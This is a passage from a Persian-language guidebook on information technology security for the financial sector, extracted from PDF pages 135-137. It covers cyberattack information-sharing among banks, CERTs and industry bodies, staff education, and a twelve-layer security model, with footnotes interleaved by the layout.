ﻧﺘﻴﺠــﺔ ﺩﺍﻧــﺶ ﻳــﺎ ﺍﻧﮕﻴــﺰﺓ ﻛــﻢ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ ،ﺍﻧــﺪﺍﺯﻩﮔﻴــﺮﻱ ﻭ
ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔــﺬﺍﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺍﺳــﺖ .ﺑــﺎ ﮔــﺴﺘﺮﺵ ﺗــﺪﺍﺭﻛﺎﺕ
ﺩﺭﻭﻥﻣـﺮﺯﻱ ﻭ ﺑــﺮﻭﻥﻣــﺮﺯﻱ ﺑــﻪ ﻣﻨﻈــﻮﺭ ﺗــﺴﻬﻴﻞ ﺩﺭ ﺍﺷــﺘﺮﺍﻙ
ﺍﻃﻼﻋﺎﺕ ﺩﻗﻴﻖ ﺩﺭﺑـﺎﺭﺓ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ،ﺳـﺮﻗﺖ،
ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﻏﻴﺮﻩ ﺗﻮﺳﻂ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ،ﺍﻣﻨﻴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺗﻘﻮﻳﺖ ﺧﻮﺍﻫﺪ ﺷـﺪ .ﺑـﻪﺍﺷـﺘﺮﺍﻙ
ﻧﮕﺬﺍﺷﺘﻦ ﺍﻃﻼﻋﺎﺕ ﻧﻪ ﺗﻨﻬﺎ ﺩﺍﻧﺶ ﺭﺍ ﺩﺭ ﻳﻚ ﺳﻄﺢ ﻣﻌـﻴﻦ ﻧﮕـﻪ
ﻣﻲﺩﺍﺭﺩ ،ﺑﻠﻜﻪ ﺍﺯ ﺁﻥ ﻣﻬﻤﺘﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻌﺔ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﺑﺨـﺶ
ﺧــﺼﻮﺻﻲ )ﺷــﺎﻣﻞ ﺑﻴﻤــﻪ( ﺭﺍ ﻧﻴــﺰ ﻣﺤــﺪﻭﺩ ﻧﻤﺎﻳــﺪ .ﺍﻳــﻦ ﻓﻘــﺪﺍﻥ
ﺍﻃﻼﻋﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺍﻓﺰﺍﻳﺶ ﻫﺰﻳﻨـﺔ ﺑﻴﻤـﺔ ﺷـﺮﻛﺘﻬﺎ ﻭ
ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﻮﺩ.
ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧـﺼﻮﺻﻲ
ﻻﺯﻡ ﺍﺳــﺖ .ﺑــﺮﺍﻱ ﻣﺜــﺎﻝ ﻛﻤﻴﺘــﺔ ﺭﺍﻫﺒــﺮﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﺍﻣﻨﻴــﺖ ﻭ
ﻣﺨﺎﻃﺮﺓ ٤٥BISTﺑﺎ ﺍﻳﺠﺎﺩ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﺍﻣﻨﻴـﺖ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ،
ﻣﻮﺿﻮﻋﺎﺗﻲ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ،ﺳﻼﻣﺖ ﻭ ﺻﺤﺖ ﭘﺮﺩﺍﺧﺘﻬﺎ ،ﺗﺠـﺎﺭﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻭ ﻓﻨﺎﻭﺭﻳﻬــﺎﻱ ﻣﺮﺑﻮﻃــﻪ ﺭﺍ ﻣــﻮﺭﺩ ﺑﺮﺭﺳــﻲ ﻗــﺮﺍﺭ
ﻣﻲﺩﻫﺪ .ﺍﻳـﻦ ﺁﺯﻣﺎﻳـﺸﮕﺎﻩ ﻫﻤﭽﻨـﻴﻦ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺩﺭﺑـﺎﺭﺓ
ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺗﺴﻬﻴﻞ ﻣﻲﻧﻤﺎﻳﺪ.
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻭﺟﻮﺩ ﺍﺗﺤﺎﺩ ﺍﻣﻨﻴﺖ ﺍﻳﻨﺘﺮﻧـﺖ ،٤٦ﺗﻴﻤﻬـﺎﻱ ﺍﻣﻨﻴـﺖ
ﺭﺧــﺪﺍﺩ ﻭ ﻭﺍﻛــﻨﺶ ،٤٧ﻭ ﻣﺮﻛــﺰ ﻓﻮﺭﻳﺘﻬــﺎﻱ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ
) ٤٨(CERTﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻫﻤﻜـﺎﺭﻱ
ﻣﺘﻘﺎﺑﻞ ﺑﺎﻋﺚ ﺍﺷﺘﺮﺍﻙ ﻓﺰﺍﻳﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ ﻭ
ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣـﻲﺷـﻮﺩ .ﻳـﻚ
ﻋﻨﺼﺮ ﻣﺸﺘﺮﻙ ﺩﺭ ﺗﻤﺎﻡ ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﻋﺎﻳـﺖ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﻭ
ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ :ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ ﻭ ﻣﺆﺳﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ ،ﻫﻮﻳﺖ ﻣﻨﺎﺑﻊ
ﺍﻃﻼﻋﺎﺕ ﺩﻗﻴﻖ ﺧﻮﺩ ﺭﺍ ﻓﺎﺵ ﻧﻤﻲﻛﻨﻨـﺪ .ﺩﺭ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﻧﻘـﺶ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﭼﻨﺪﺟﺎﻧﺒﻪ ﺩﺭ ﺗﺴﻬﻴﻞ ﻫﻤﻜﺎﺭﻱ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﺭﺳﻲ ﺩﺍﺭﺩ.
ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﭼﻪ ﺍﻗﺘﺼﺎﺩ ﻣﻨﺴﺠﻢﺗﺮ ﺷﻮﺩ ،ﺑﻪ ﻧﺤﻮ ﺍﺣﺴﻦ
BIST's Security and Risk Assessment
Steering Committee
Internet Security Alliance
Forum of Incident and Response Security
Teams
Computer Emergency Response Team
45
46
47
48
١٣٥
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺍﻧﺠﺎﻡﺷﺪﻥ ﻣﺴﺌﻮﻟﻴﺖ ﻫﺮ ﺑﺨﺶ ﺍﻫﻤﻴﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛ ﻭ
ﻲ ﺍﻣـﺮﻭﺯ ،ﺩﺭ ﺁﻏـﺎﺯ
ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺻـﻨﻌﺖ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟ ﹺ
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ ﻭ ﺗﻐﻴﻴـﺮﺍﺕ
ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺩﻫﺔ ﮔﺬﺷـﺘﻪ ﺑـﻮﺩ ﻛـﻪ ﻭﺍﺑـﺴﺘﮕﻴﻬﺎﻱ ﺩﺭﻭﻧـﻲ ﺍﻳـﻦ
ﺳﻴﺴﺘﻢ ﺭﺍ ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﻭ ﺑﻴﺸﺘﺮ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﻧﻈﺎﺭﺗﻲ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﻧـﻮﻳﻦ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻳﻲ
ﻧﻈﻴﺮ ﻃﺮﺣﻬﺎﻱ ﺗﺒﺎﺩﻝ ﻓﻌﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﻛﺎﺭﻛﻨﺎﻥ؛
ﺭﻛﻦ ﻫﻔﺘﻢ:
ﺁﻣﻮﺯﺵ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ
ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
•
ﺗﺪﻭﻳﻦ ﻳﻚ ﻃﺮﺡ ﭼﻨﺪﻣﻨﻈﻮﺭﺓ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺮﺍﻱ ﺁﻣـﻮﺯﺵ
ﻣﺘﺨﺼﺼﻴﻦ ﺁﻳﻨﺪﺓ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻭ ﺑﻄﻮﺭ ﻫﻤﺰﻣـﺎﻥ
ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺩﺍﻧﺶ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ.
ﺗﺤﻠﻴﻞ ﺁﻣﺎﺭﻱ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺑﻴﺶ ﺍﺯ
%۵۰ﺣﻤﻼﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ
ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ .ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﺗﺤﺼﻴﻼﺕ ﻛـﻢ
ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤـﻼﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺁﺳـﻴﺐﭘـﺬﻳﺮﺗﺮ ﺍﺳـﺖ .ﺑـﺮﻋﻜﺲ،
ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﻛﻪ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺁﮔـﺎﻩ ﺍﺳـﺖ
ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻻﻳﺔ ﻣﺆﺛﺮ ﺣﻔﺎﻇﺘﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﻴﺎﻓﺰﺍﻳﺪ.
ﺭﻛﻦ ﻫﺸﺘﻢ:
ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ
ﺍﻗﺪﺍﻣﺎﺕ ﺍﻭﻟﻴﺔ ﺁﻣﻮﺯﺷﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺍﻋﻢ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ -ﻛﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ
ﺑﻪ ﻧﻈﺎﺭﺕ ﻭ ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ -ﻭ ﻫﻤﭽﻨـﻴﻦ ﺑـﺮﺍﻱ
ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺍﻗـﺪﺍﻣﺎﺕ
ﺍﻭﻟﻴﻪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻣﻲﺷﻮﻧﺪ:
•
ﺍﺭﺗﻘﺎﻱ ﺁﮔﺎﻫﻲ ﻭ ﺁﻣﻮﺯﺵ ﺍﻓـﺮﺍﺩ ﺑﺨـﺶ ﻣـﺎﻟﻲ ﺩﺭ ﻣـﻮﺭﺩ
ﺍﺻﻮﻝ ﺍﺧﻼﻗﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺭﻓﺘـﺎﺭ ﻣﻨﺎﺳـﺐ ﻛـﺎﺭﺑﺮ ﺩﺭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ؛
•
ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ
ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺭﻓﺘﺎﺭ ﺩﺭﺳﺖ ﻭ ﺭﺍﻫﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺑـﺮﺍﻱ
ﮔﺰﺍﺭﺵ ﺣﻤﻼﺕ ﻳﺎ ﺭﺧﺪﺍﺩﻫﺎ ﺑﺎ ﻫﻤﺎﻫﻨﮕﻲ ﻛﺎﻣﻞ ﺑﺎ ﺗﻤـﺎﻡ
ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ ﺗﻜﻤﻴـﻞ ﺍﻃﻼﻋـﺎﺕ ﺟﻬـﺎﻧﻲ
ﺩﺭﺑﺎﺭﺓ ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ؛
•
ﻱ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻧﻮﻳﻦ ﺩﺭﺑـﺎﺭﺓ
ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﻣﺠﺎﻣﻊ ﺑﺎﻧﻜﺪﺍﺭ ﹺ
٤٩
ﻧﻴﺎﺯ ﺑﻪ ﻃﺮﺣﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧـﺪﺍﺩ ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ
ﺣﺎﺩﺛﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ؛
•
ﺗﺴﻬﻴﻞ ﻫﻤﻜﺎﺭﻱ ﻭ ﺍﻧﺘﻘﺎﻝ ﺩﺍﻧﺶ ﻣﻴﺎﻥ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ،
ﻭﺍﺣــﺪﻫﺎﻱ ﺍﻃﻼﻋــﺎﺕ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ ٥٠ﻭ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ
ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺍﺟﺰﺍﻱ ﺑﻨﻴﺎﺩﻱ ﻳﻚ
ﻃــﺮﺡ ﻣﻨﺎﺳــﺐ ﺑــﺮﺍﻱ ﺣﻔــﻆ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﻭ ﻛــﺎﻫﺶ
ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻄﻬﺎﻱ ﺩﺍﺭﺍﻱ ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ ﺑﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳﻨـﺪ.
ﺍﻳﻦ ﺳﻠﺴﻠﺔ ﺩﻭﺍﺯﺩﻩ ﻻﻳﻪﺍﻱ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﻫـﺮ ﺷـﺮﺍﻳﻂ
ﻛﺪﺍﻡ ﻣﻜﺎﻧﻴﺰﻡ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ؛ ﻭ ﻫﻤﭽﻨﻴﻦ
ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﻫﺮ ﺷﺒﻜﻪ ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺿـﻌﻴﻔﺘﺮﻳﻦ ﻋﻨـﺼﺮ
ﺁﻥ ﺷﺒﻜﻪ ﺍﺳﺖ .ﺟﺰﺋﻴﺎﺕ ﺍﻳﻦ ﻃـﺮﺡ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪﺍﻱ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﺍﻧﺘﻬﺎﻱ ﻫﻤﻴﻦ ﺑﺨﺶ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﺗﺒﺼﺮﻩﻫﺎ
ﺑﺨﺶ ﺳﻮﻡ ﻭ ﭼﻬﺎﺭﻡ ﻛﺘﺎﺏ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻣﺤﻴﻄﻬـﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ
ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺷﻜﻞﮔﻴﺮﻱ ﻣـﻲﺑﺎﺷـﻨﺪ ﻭ ﺑـﺎ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﻳـﻚ
ﺭﻭﺵ ﺿﺎﺑﻄﻪﻣﻨﺪ ﺗﻼﺵ ﺩﺍﺭﻧﺪ ﺍﻗﺘﺼﺎﺩ ﻭ ﻗﺎﻧﻮﻥ ﻭ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑـﻪ
ﺗﻨﺎﺳﺐ ﻳﻜﺪﻳﮕﺮ ﻫﻤﺎﻫﻨﮓ ﻛﻨﺪ .ﺑﻪ ﻋﻠﺖ ﺭﺷـﺪ ﺳـﺮﻳﻊ ﺟﻬـﺎﻧﻲ،
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺎﻟﺒﻲ ﻣﺮﻣﻮﺯ ﺩﺍﺭﺩ .ﻏﺎﻟﺐ ﻛـﺸﻮﺭﻫﺎ ﺍﺯ ﺟﻤﻠـﻪ
ﺁﻧﻬﺎ ﻛﻪ ﺗﺠﺮﺑﺔ ﺑﻴﺸﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻧـﺪ ﻫﻨـﻮﺯ ﺍﺯ
ﺩﺍﻧﺶ ﺍﻧﺪﻛﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻧﻮﻳﻦ ﺣﺘـﻲ
ﺍﺯ ﺍﻳﻦ ﻫﻢ ﻛﻤﺘـﺮ ﻣـﻲﺩﺍﻧﻨـﺪ .ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺗﻮﺟـﻪ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ
ﺁﻣﻮﺯﻩﻫﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺍﺭﺩ؛ ﭼﺮﺍﻛـﻪ ﻣﺤـﻞ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ
ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺩﻩ ﻭ ﺯﻣﺎﻥ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺗﺠﺮﺑﺔ ﻣﺰﺍﻳـﺎ ﻭ ﻣﻌﺎﻳـﺐ ﺁﻥ
ﺩﺍﺷﺘﻪ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻭﻟﻴﻪ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺭﺍ ﺑﻮﺟـﻮﺩ
ﺁﻭﺭﺩﻩ ﺍﺳﺖ ٥٢.ﺩﺭ ﺗﺪﻭﻳﻦ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﻓﻌﺎﻟﻴــﺘﻬﺎ ﻭ ﺗﺠـﺎﺭﺏ
Financial Stability Institute
Incident Response Plan
Financial Intelligence Units
49
50
۵۲
ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ARPANETﺑﻮﺟﻮﺩ ﺁﻣﺪ ،ﻛـﻪ ﺩﺭ ﺳـﺎﻝ ۱۹۶۹ﺑﻮﺳـﻴﻠﺔ
ﺳـــﺎﺯﻣﺎ
ﻥ ﭘـــﺮﻭﮊﻩﻫـــﺎﻱ ﺗﺤﻘﻴﻘـــﺎﺗﻲ ﭘﻴـــﺸﺮﻓﺘﻪ ) Advanced
51
ﺑﺨﺶ ﺳﻮﻡ
•
ﻃﺮﺍﺣﻲ ﺩﻭﺭﻩﻫﺎﻱ ﻣﺘﻤﺮﻛﺰ ﺑـﺮﺍﻱ ﻣﻤﺘﺤﻨـﺎﻥ ﺑـﺎ ﻛﻤـﻚ
ﻣﺆﺳــﺴﻪ ﭘﺎﻳــﺪﺍﺭﻱ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ ٥١ﻳــﺎ ﺩﻳﮕــﺮ ﻣﺮﺍﻛــﺰ
ﺁﻣﻮﺯﺷﻲ؛
١٣٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻛﺸﻮﺭﻫﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﺍﺭﻭﭘﺎ ،ﺁﺳﻴﺎ ﻭ ﺁﻣﺮﻳﻜﺎﻱ ﺟﻨﻮﺑﻲ
ﻧﻴﺰ ﺗﻮﺟﻪ ﺷـﺪﻩ ﺍﺳـﺖ .ﺑـﺪﻳﻬﻲ ﺍﺳـﺖ ﻛـﻪ ﻣﻄﺎﻟـﺐ ﺯﻳـﺎﺩﻱ ﺭﺍ
ﻣﻲﺗﻮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺗﻲ ﭼـﻮﻥ "ﻣـﺸﻜﻼﺕ ﻭﻳـﮋﺓ ﺑﺎﺯﺍﺭﻫـﺎﻱ
ﻧﻮﻳﻦ ﺩﺭ ﺍﻳﻦ ﻋﺮﺻﻪ" ،ﻭ "ﺯﻣﻴﻨﻪﻫﺎﻱ ﺣﻘﻮﻗﻲ ﻭ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﻪﻫـﺎﻱ
ﺳﺎﺯﻣﺎﻧﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ"
ﻃﺮﺡ ﻛﺮﺩ.
ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻓﻌﺎﻟﻴـﻬﺎ ،ﻧﻴﺮﻭﻱ ﺑﺎﻟﻘﻮﺓ ﻋﻈﻴﻢ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ
ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﻄﺒﻴﻖ ﺩﺍﺩﻩﺍﻧﺪ ﺑﻪ ﺷﺪﺕ ﺑﻪ ﺧﻄـﺮ
ﻣﻲﺍﻓﺘﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨـﺎﻥ ﻛـﺴﺎﻧﻴﻜﻪ ﺩﺭ ﺑـﺎﺯﺍﺭ ﻫـﺴﺘﻨﺪ
ﻱ ﺍﻳـﻦ
ﺑﻄﻮﺭ ﺟﺪﻱ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺑﻌـﺪ ﹺ
ﺑﺨﺶ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺩﻧﺒﺎﻝ ﺷﺪﻩﺍﻧﺪ:
ﺍﻟﻒ( ﺭﻭﺷﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ؛
ﺏ( ﺭﺍﻫﻨﻤﺎﻱ ﻋﻤﻠﻲ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ
ﺑﺮﺍﻱ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ؛
ﺝ(
ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﻭ ﻭﻳﮋﻩ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭﺑﺎﺭﺓ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛ ﻭ
ﺩ(
ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ،ﺑﺎ ﺍﻇﻬﺎﺭ ﻧﻈﺮﻫـﺎﻳﻲ ﺍﺯ
ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺩﺭ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ ،ﺑﻮﻳﮋﻩ
ﺩﺭ ﺭﺍﺑﻄــﻪ ﺑــﺎ ﺑﺨــﺶ ﻣــﺎﻟﻲ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﺗﺠــﺎﺭﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ.
(Research Projects Agencyﺩﺭ ﻭﺯﺍﺭﺕ ﺩﻓــﺎﻉ ﺍﻳــﺎﻻﺕ
ﻣﺘﺤﺪﻩ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ.
١٣٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻓﺼﻞ ﺳﻮﻡ
